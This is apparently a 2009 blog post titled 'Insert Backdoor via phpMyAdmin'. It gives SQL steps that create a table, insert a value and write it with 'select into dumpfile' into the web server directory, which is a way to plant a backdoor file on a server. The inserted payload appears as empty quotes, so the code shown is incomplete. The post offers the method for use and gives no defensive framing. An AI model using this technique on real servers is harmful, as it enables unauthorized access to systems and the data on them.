Menu

Showing posts with label Insert Backdoor via phpMyAdmin. Show all posts
Showing posts with label Insert Backdoor via phpMyAdmin. Show all posts

Sep 6, 2009

Insert Backdoor via phpMyAdmin

1.
CREATE TABLE test(
Stack TEXT
)  TYPE=MYISaM;

INSERT INTO test(stack)
VALUES(
 ''
''
);
2.
select * into dumpfile 'www dir' from test;
# ITS ©
# 2008 - 2009